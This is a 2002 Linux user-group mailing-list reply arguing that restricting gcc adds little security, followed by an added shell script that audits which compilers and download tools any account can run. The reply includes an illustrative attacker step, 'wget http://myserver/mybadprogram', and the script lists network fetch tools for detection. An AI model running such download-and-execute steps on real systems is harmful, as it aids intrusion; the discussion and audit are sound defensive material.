[NTLUG:Discuss] Secure a system by securing GCC..

Aaron Goldblatt lists-ntlug at goldblatt.net
Mon Jul 1 07:21:12 CDT 2002


> If execute rights to the GCC (and/or other directories) were revoked to all
> but the root user, wouldn't that reduce the chance of damage by keeping
> someone from compiling code to elevate their privileges should they make it
> in?

There is an idea that you should disable anything the user doesn't need.

There are a couple of problems with this particular suggestion, though.

First, some users may want to compile custom programs in ~/bin, which
you don't want to install.  That's a legitimate use of gcc.

Second, if someone has blown a hole in your system wide enough to drop
to a shell, compiling software is the least of your worries.  What's
more, if you have something like wget installed (and who doesn't?),
disabling gcc has absolutely no effect on the attacker's ability to get
and execute code on your machine.  wget http://myserver/mybadprogram,
and boom, it's already downloaded and compiled.

An attacker smart enough to pull this off will also understand that
compiling a binary under a modern OS for transfer to another similar
machine (Linux ELF binary, using glibc2.0 or 2.1) just isn't that
difficult.  Three runs of the compiler (with appropriate setup, once for
libc, once for glibc2, and once for glibc2.1) is all I need to compile
MyTool.  If I do a static compilation (which is what a smart attacker
would do, because then he's not dependent on some library that may or
may not be missing or the wrong version or otherwise compromised on your
machine), I may need even less than that, at the expense of a larger
binary which isn't generally a problem anyway.

ag
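
The point made in the message above, as an added example that is not part of the original post: a shell audit that reports, for one bin directory, which compilers and which file-transfer tools any local account can still execute. The tool lists and function names are assumptions for illustration, and the demo directory is constructed.

```shell
#!/bin/sh
# Added example. The tool lists are illustrative assumptions, not exhaustive.
COMPILERS="gcc cc g++ as ld"
FETCHERS="wget curl ftp scp"

# world_exec FILE: succeed if FILE (following symlinks) is a regular file
# with the "other" execute bit set, i.e. every local account can run it.
world_exec() {
    [ -n "$(find -L "$1" -prune -type f -perm -001 2>/dev/null)" ]
}

# audit_dir DIR: print "<class> <tool> <open|restricted>" for each listed
# tool that exists in DIR.
audit_dir() {
    dir=$1
    for class in compiler fetcher; do
        case $class in
            compiler) tools=$COMPILERS ;;
            fetcher)  tools=$FETCHERS ;;
        esac
        for t in $tools; do
            [ -e "$dir/$t" ] || continue
            if world_exec "$dir/$t"; then state=open; else state=restricted; fi
            echo "$class $t $state"
        done
    done
}

# count_open DIR CLASS: number of CLASS tools in DIR that everyone can run.
count_open() {
    audit_dir "$1" |
        awk -v c="$2" '$1 == c && $3 == "open" { n++ } END { print n + 0 }'
}

# Constructed demo: gcc locked down to owner and group (mode 750) while the
# transfer tools keep the usual 755, the situation the message describes.
demo() {
    d=$(mktemp -d) || return 1
    for t in gcc wget curl; do printf '#!/bin/sh\n' > "$d/$t"; done
    chmod 750 "$d/gcc"
    chmod 755 "$d/wget" "$d/curl"
    audit_dir "$d"
    rm -rf "$d"
}
demo
```

On the constructed directory the compiler is reported as restricted while both transfer tools remain open, which is the gap the message points out.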



